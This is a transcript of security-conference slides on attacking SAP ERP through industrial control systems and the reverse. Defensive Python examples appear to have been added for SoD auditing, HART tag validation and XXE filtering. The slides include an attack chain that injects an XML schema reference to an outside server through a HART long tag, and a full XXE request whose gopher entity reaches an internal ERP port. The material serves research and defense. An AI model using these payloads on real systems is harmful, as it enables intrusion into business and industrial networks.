Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
Transcript (slide text) of "Business Breakdown Vulnerabilities in ERP via ICS and ICS via ERP"
Invest in security to secure investments
Alexander Polyakov, CTO ERPScan, President EAS-SEC
About ERPScan
• The only 360-degree SAP Security solution - ERPScan Security Monitoring Suite for SAP
• Leader by the number of acknowledgements from SAP (150+)
• 60+ presentations at key security conferences worldwide
• 25 Awards and nominations
• Research team - 20 experts with experience in different areas of security
• Headquarters in Palo Alto (US) and Amsterdam (EU)
How do they look like
[Diagram: enterprise landscape. Corporate systems: Portal, HR, BW, ECC, Billing, BI, IS, CRM, SRM, SolMan, SAP AS, XI/PI. External parties: Suppliers, Customers, Banks, Insurance, Partners, Branches. Plant side: PAS/EAS, MES, SCADA/DCS, OPC, PLCs, Field Devices]
How popular they are
SAP • More than 246000 customers worldwide • 86% of Forbes 500 Oracle • 100% of Fortune 100 Microso^ • More than 300,000 businesses worldwide choose Microso^
Dynamics ERP and CRM so^ware
4
What can happen
• Espionage
– Theft of Financial Information
– Trade Secret theft
– Supplier and Customer list theft
– HR data theft
– Other Corporate Data theft
• Sabotage
– Denial of service
– Modification of financial statements
– Access to technology network (SCADA/ICS) by trust relations
• Fraud
– False transactions
– Modification of master data
How easy is that
Systems should be connected with each other
• Directly
– ERP collects information from PAS/EAS
• Indirectly
– ERP shares database with MES/EAS
– ERP is connected with ICS/SCADA via XI or PI system
• In one network
– Exploit typical vulnerabilities (password sniffing)
• In different networks
– Exploit trust relations
Internet to Internal
• Via Internet resources (SAP Portal/CRM/SRP)
• Via Partners (SAP XI)
• Via SAP Router
• Via Workstations (Trojans)
• Via Unnecessary SAP Services in Internet
How to break SAP?
At least:
• Unnecessary privileges
• Misconfigurations
• Vulnerabilities
• Custom code issues
Unnecessary privileges
• One example: Create vendor + Approve Payment order
• Usually ((~100 Roles X 10 actions)^2)/2 = 500k
• 500k potential conflicts for each user!
• A lot of work
• Usually takes two years to decrease conflicts from millions to hundreds.
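The slide's conflict example (create vendor + approve payment order) as a small segregation-of-duties audit, added here as an illustration rather than anything from the talk or ERPScan's product. The role names, the actions they grant and the conflict matrix are all constructed; a real check would read them from the system's authorization data. The candidate-pair count is the exact n choose 2 behind the slide's (n^2)/2 estimate.

```python
# Added example (not ERPScan's code): minimal segregation-of-duties (SoD)
# check over a role -> actions assignment. All role and action names below
# are constructed for illustration.
from itertools import combinations

# Conflict matrix: pairs of actions one person must not hold together (constructed).
SOD_RULES = {
    frozenset({"create_vendor", "approve_payment_order"}),   # the slide's example
    frozenset({"create_purchase_order", "post_goods_receipt"}),
    frozenset({"maintain_bank_master", "release_payment_run"}),
}

# Role -> set of actions it grants (constructed sample roles).
ROLE_ACTIONS = {
    "Z_AP_CLERK": {"create_vendor", "display_vendor", "park_invoice"},
    "Z_AP_MANAGER": {"approve_payment_order", "release_payment_run"},
    "Z_MM_BUYER": {"create_purchase_order", "display_purchase_order"},
    "Z_WH_OPERATOR": {"post_goods_receipt"},
}


def effective_actions(roles, role_actions=ROLE_ACTIONS):
    """Union of all actions granted by a user's roles (unknown roles ignored)."""
    acts = set()
    for r in roles:
        acts |= role_actions.get(r, set())
    return acts


def candidate_pairs(roles, role_actions=ROLE_ACTIONS):
    """Number of action pairs a reviewer has to judge for this user:
    the slide's (n^2)/2 figure, computed exactly as n choose 2."""
    n = len(effective_actions(roles, role_actions))
    return n * (n - 1) // 2


def sod_violations(roles, rules=SOD_RULES, role_actions=ROLE_ACTIONS):
    """Conflicting action pairs the user holds, each side with the roles granting it."""
    acts = effective_actions(roles, role_actions)

    def granted_by(action):
        return sorted(r for r in roles if action in role_actions.get(r, set()))

    found = []
    for a, b in combinations(sorted(acts), 2):
        if frozenset({a, b}) in rules:
            found.append(((a, granted_by(a)), (b, granted_by(b))))
    return found


def audit(users, **kw):
    """users: {user: [roles]} -> {user: [violations]} for users with at least one conflict."""
    return {u: v for u, roles in users.items() if (v := sod_violations(roles, **kw))}


if __name__ == "__main__":
    users = {"jdoe": ["Z_AP_CLERK", "Z_AP_MANAGER"], "asmith": ["Z_MM_BUYER"]}
    for user, viol in audit(users).items():
        print(f"{user}: {candidate_pairs(users[user])} pairs reviewed")
        for (a, ra), (b, rb) in viol:
            print(f"  {a} (via {','.join(ra)}) conflicts with {b} (via {','.join(rb)})")
```

Reporting which role grants each side of a conflict is what makes the output actionable: the remediation is usually to split or trim a role, not to remove a user.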
Misconfigurations
~1500 profile parameters
~1200 Web applications
~700 web services
~100 specific commands for mmc
~100 specific checks for each of the 50 modules

Misconfigurations
1. Lack of patch management
2. Default passwords
3. Unnecessary enabled functionality
4. Remotely enabled administrative services
5. Insecure configuration
6. Unencrypted communications
7. Internal access control and SoD
8. Insecure trust relations
9. Monitoring of security events
Vulnerabilities
[Bar chart: number of SAP security notes per year, 2001 to 2014; y-axis 0 to 900]
By July 2014 – 3000+ notes
Only one vulnerability is enough to get access to ALL business-critical DATA
From ERP to ICS
Some systems should be connected at least on the network layer.
• SAP RFC links
• Database links
• Same Domain
• Similar passwords
!TRUST CONNECTIONS – main issue
From ICS/Devices to ERP
• USB (like Stuxnet)
• Wireless devices (usually bad encryption)
• Wired devices (need physical access)
• Attack on wire (low-level field protocols)
– RS485
– Profibus PA
– FF H1
– HART
From ICS to ERP
[Diagram: corporate network with ERP; routers/firewalls; MES; OPC, SCADA/DCS and HMI; industrial bus with PLC1, PLC2,3... and PLC7,8...; field devices]
From ICS to ERP
• HART (current loop, 4-20 mA)
• Mostly used in power plants, chemical factories, oil & gas industry
• Every field device (in general, every device) in a PAS industrial facility hierarchy has a unique ID
• For HART devices, the HART long tag is used as a universal ID
• HART tag (8 bytes packed ASCII) and HART long tag (32 bytes ASCII) are used as application layer address
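The defender's reading of this slide is that a HART tag is an identifier written by whoever can talk to the field device, so a PAS or asset-management import has to treat it as untrusted input. The example below, added here and not taken from the talk or from any PAS product, decodes the packed-ASCII short tag (the 6-bit packing, four characters per three bytes, follows the HART specification as I know it), validates a long tag against a length and character policy of this example's own choosing, and always quotes the tag when it is written into XML. The validation policy and the XML element layout are assumptions.

```python
# Added example (not the talk's code): HART tags handled as untrusted input.
# Packed-ASCII decoding per the HART spec (6-bit characters, 4 per 3 bytes);
# the long-tag policy and the XML layout are this example's own assumptions.
from xml.sax.saxutils import quoteattr

PACKED_ASCII_BYTES = 6   # short tag: 8 characters packed into 6 bytes
LONG_TAG_MAX = 32        # long tag: up to 32 bytes of Latin-1 text


def decode_packed_ascii(data: bytes) -> str:
    """Unpack HART packed ASCII: each 6-bit value maps to ASCII 0x20-0x5F."""
    if len(data) % 3:
        raise ValueError("packed ASCII length must be a multiple of 3 bytes")
    out = []
    for i in range(0, len(data), 3):
        chunk = int.from_bytes(data[i:i + 3], "big")
        for shift in (18, 12, 6, 0):
            v = (chunk >> shift) & 0x3F
            out.append(chr(v | 0x40 if v < 0x20 else v))  # 0x00-0x1F -> '@'..'_'
    return "".join(out)


def encode_packed_ascii(text: str) -> bytes:
    """Inverse of decode_packed_ascii; rejects characters outside the packed set."""
    if len(text) % 4:
        raise ValueError("packed ASCII text length must be a multiple of 4")
    out = bytearray()
    for i in range(0, len(text), 4):
        chunk = 0
        for ch in text[i:i + 4]:
            code = ord(ch)
            if not 0x20 <= code <= 0x5F:
                raise ValueError(f"{ch!r} is not representable in packed ASCII")
            chunk = (chunk << 6) | (code & 0x3F)
        out += chunk.to_bytes(3, "big")
    return bytes(out)


def validate_long_tag(raw: bytes) -> str:
    """Accept a long tag only if it is at most 32 bytes of printable ASCII.
    The chain on the following slides smuggles XML markup through this field,
    so quotes, angle brackets and '&' are refused outright (policy assumption)."""
    if len(raw) > LONG_TAG_MAX:
        raise ValueError("long tag exceeds 32 bytes")
    tag = raw.rstrip(b"\x00 ").decode("ascii")  # strict: non-ASCII bytes are rejected
    if not tag.isprintable():
        raise ValueError("long tag contains control characters")
    if any(c in tag for c in "<>\"'&"):
        raise ValueError("long tag contains XML-significant characters")
    return tag


def device_element(long_tag: str, device_id: str) -> str:
    """Build the XML a PAS would store; attribute values are always quoted/escaped,
    so even a tag that slipped past validation cannot break out of the attribute."""
    return f"<Device id={quoteattr(device_id)} longTag={quoteattr(long_tag)}/>"


if __name__ == "__main__":
    print(decode_packed_ascii(encode_packed_ascii("TIC1PT01")))
    print(device_element(validate_long_tag(b"FT-101 FEED FLOW"), "dev-1"))
```

The two layers are deliberate: the allow-list on the tag stops the injection at the import boundary, and `quoteattr` on the way out means the XML writer does not depend on the import having been done correctly.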
Vulnerabili=es
21
DEMO Infrastructure Corporate network
ERP
Transmioer
Firewall (only HTTP traffic allowed)
FieldCare (PAS)
Current loop (HART Analog 4-‐20mA line)
Ethernet
HART modem
Attack Scheme
[Diagram with steps numbered 1 to 6: (1) the attacker sends a HART Command 22 long tag change packet over the current loop to the HART transmitter, via the HART gateway/master; (2) the PAS (FieldCare) reads the tag as XML data, the tag being A' xmlns='x-schema:http://q45.ru (XMLI); (3) the PAS sends a request for the remote XSD schema to the evil web server on the Internet; (4) the reply is an XSD with SSRF; (5) SSRF from the PAS to the ERP; (6) SAP remote command execution exploit query, giving RCE on the ERP]
From ERP to ICS
• SSRF http://cwe.mitre.org/data/definitions/918.html
• Second place in Top 10 web application techniques 2012
• Allows to bypass firewall restrictions and directly connect to protected systems via connected systems
SSRF
[Diagram: Server A (Portal or XI) at 192.168.0.1 receives the request below and is made to connect to Server B (ERP, HR, BW etc.) at 172.16.0.1 on port 3300; the effect is equivalent to "telnet 172.16.0.1 3300", delivering the AAAAAAAAAAAAA payload]

    POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1
    Host: 192.168.0.1:8000

    <?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE foo [ <!ELEMENT foo ANY >
    <!ENTITY date SYSTEM "gopher://172.16.0.1:3300/AAAAAAAAA" >]>
    <foo>&date;</foo>
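The request above works because the SOAP endpoint lets a DTD through to an XML parser that resolves external entities. A gate that refuses any DTD before parsing removes the whole class, and the same scan yields what a SOC wants in the alert: which URI the entity pointed at and whether it targets an internal address. The code below is an added example written for this page, not SAP's or ERPScan's code; the request body it scans is a constructed copy of the one on the slide, and the scheme and address classification are this example's own assumptions.

```python
# Added example (not SAP's or ERPScan's code): pre-parse gate for SOAP bodies
# that refuses DTDs (the carrier for the external-entity SSRF on the slide) and
# reports the entity target for alerting. The sample body is a constructed copy
# of the request shown on the slide.
import ipaddress
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

SAMPLE_REQUEST_BODY = (
    b'<?xml version="1.0" encoding="ISO-8859-1"?>\n'
    b'<!DOCTYPE foo [ <!ELEMENT foo ANY >\n'
    b'<!ENTITY date SYSTEM "gopher://172.16.0.1:3300/AAAAAAAAA" >]>\n'
    b'<foo>&date;</foo>'
)

DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)
# SYSTEM "uri" or PUBLIC "id" "uri"; parameter entities (%name) included.
ENTITY_RE = re.compile(
    rb"""<!ENTITY\s+%?\s*\w+\s+(?:SYSTEM|PUBLIC\s+"[^"]*")\s*["']([^"']+)["']""",
    re.IGNORECASE,
)


def external_entity_targets(body: bytes) -> list:
    """URIs named by external entity declarations in the body, [] if none."""
    return [m.group(1).decode("latin-1") for m in ENTITY_RE.finditer(body)]


def classify_target(uri: str) -> str:
    """'internal' for private/loopback/link-local literal IPs (the case that
    matters behind a firewall), 'external' for other literal IPs, and
    'hostname' when a name would need resolving (not done here)."""
    host = urlsplit(uri).hostname or ""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "hostname"
    return "internal" if (ip.is_private or ip.is_loopback or ip.is_link_local) else "external"


def scan_request(body: bytes) -> dict:
    """Allow/deny decision plus the details worth putting in the alert."""
    targets = external_entity_targets(body)
    has_dtd = bool(DOCTYPE_RE.search(body))
    return {
        "allowed": not has_dtd,
        "reason": "DTD in SOAP body" if has_dtd else "ok",
        "targets": targets,
        "classes": [classify_target(t) for t in targets],
    }


def parse_soap_body(body: bytes) -> ET.Element:
    """Gate first, parse second: a DTD never reaches the XML parser."""
    verdict = scan_request(body)
    if not verdict["allowed"]:
        raise ValueError(f"{verdict['reason']}; external entities: {verdict['targets']}")
    return ET.fromstring(body)


if __name__ == "__main__":
    print(scan_request(SAMPLE_REQUEST_BODY))
    print(parse_soap_body(b"<foo>ok</foo>").tag)
```

Rejecting on the DOCTYPE keyword rather than on a list of dangerous schemes is the point: there is no legitimate reason for a SOAP request to carry a DTD, and an allow-list of schemes would still leave internal HTTP targets reachable.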